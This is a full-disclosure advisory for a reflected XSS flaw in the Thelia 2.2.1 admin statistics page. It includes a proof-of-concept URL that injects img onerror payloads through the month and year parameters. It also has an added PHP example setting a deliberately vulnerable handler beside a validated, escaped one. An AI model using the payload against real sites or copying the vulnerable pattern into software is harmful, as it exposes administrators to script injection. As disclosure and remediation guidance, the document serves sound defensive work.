Thelia 2.2.1: XSS
Date: 2015-11-13 11:35:38
1. Introduction
| Affected Product: | Thelia 2.2.1 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | info@thelia.net |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/29/2015 |
| Disclosed to public: | 11/13/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits: | Tim Coen of Curesec GmbH |
2. Overview
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
Thelia 2.2.1 suffers from a reflected XSS vulnerability in the administration statistics page (admin/home/stats): the month and year GET parameters are echoed into the response without being validated as integers or HTML-encoded. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection. As the affected page is part of the admin backend, an attacker would typically have to trick a logged-in administrator into opening a crafted link.
3. Proof of Concept
http://localhost/thelia_2.1.5/web/admin/home/stats?month=95<img src=no onerror=alert(1)>&year=20155<img src=no onerror=alert(2)>
4. Solution
This issue has not been fixed by the vendor. Until a fix is available, the month and year parameters should be validated as integers in the expected range and all output derived from request parameters should be HTML-encoded.
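To illustrate the defect and the recommended fix, the following PHP is an added example and not Thelia's own code: a hypothetical handler that reflects the month and year query parameters unescaped (the behaviour the proof of concept relies on), next to a hardened version that validates both as range-checked integers and escapes at the output boundary. The function names and the constructed query array are assumptions made for this illustration.

```php
<?php
// Added example, not code from Thelia. Contrasts the reflective pattern that
// makes the admin/home/stats parameters exploitable with a hardened handler.

// Vulnerable pattern (hypothetical): raw query values are concatenated into HTML.
function render_stats_vulnerable(array $query): string
{
    $month = $query['month'] ?? '';
    $year  = $query['year'] ?? '';
    return '<h1>Stats for ' . $month . '/' . $year . '</h1>';
}

// Hardened pattern, step 1: accept only integers in the expected range.
// Returns null for anything else instead of passing the value through.
function parse_stats_params(array $query): ?array
{
    $month = filter_var($query['month'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 12]]);
    $year  = filter_var($query['year'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1970, 'max_range' => 2100]]);
    if ($month === false || $year === false) {
        return null;
    }
    return ['month' => $month, 'year' => $year];
}

// Hardened pattern, step 2: reject invalid input and HTML-encode at output
// even for values already known to be integers (defence in depth).
function render_stats_hardened(array $query): string
{
    $p = parse_stats_params($query);
    if ($p === null) {
        // The real handler would answer with HTTP 400 here; the attacker's
        // string is never reflected.
        return '<p>Invalid month or year.</p>';
    }
    $e = function (string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    };
    return '<h1>Stats for ' . $e((string) $p['month']) . '/' . $e((string) $p['year']) . '</h1>';
}

// Constructed query values taken from the advisory's proof-of-concept URL.
$poc = [
    'month' => '95<img src=no onerror=alert(1)>',
    'year'  => '20155<img src=no onerror=alert(2)>',
];
$benign = ['month' => '11', 'year' => '2015'];

echo "vulnerable: ", render_stats_vulnerable($poc), PHP_EOL;
echo "hardened:   ", render_stats_hardened($poc), PHP_EOL;
echo "hardened:   ", render_stats_hardened($benign), PHP_EOL;
```

Run with `php stats_xss.php`: the first line shows the two img tags landing inside the page verbatim, the second line shows the payload rejected, and the third line shows a legitimate request still rendering. The range check is what removes the attack surface; the output encoding is kept so that a later change to the validation logic cannot silently reintroduce the reflection.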
5. Report Timeline
| 09/29/2015 | Informed Vendor about Issue (no reply) |
| 10/21/2015 | Reminded Vendor of Disclosure Date (no reply) |
| 11/13/2015 | Disclosed to public |


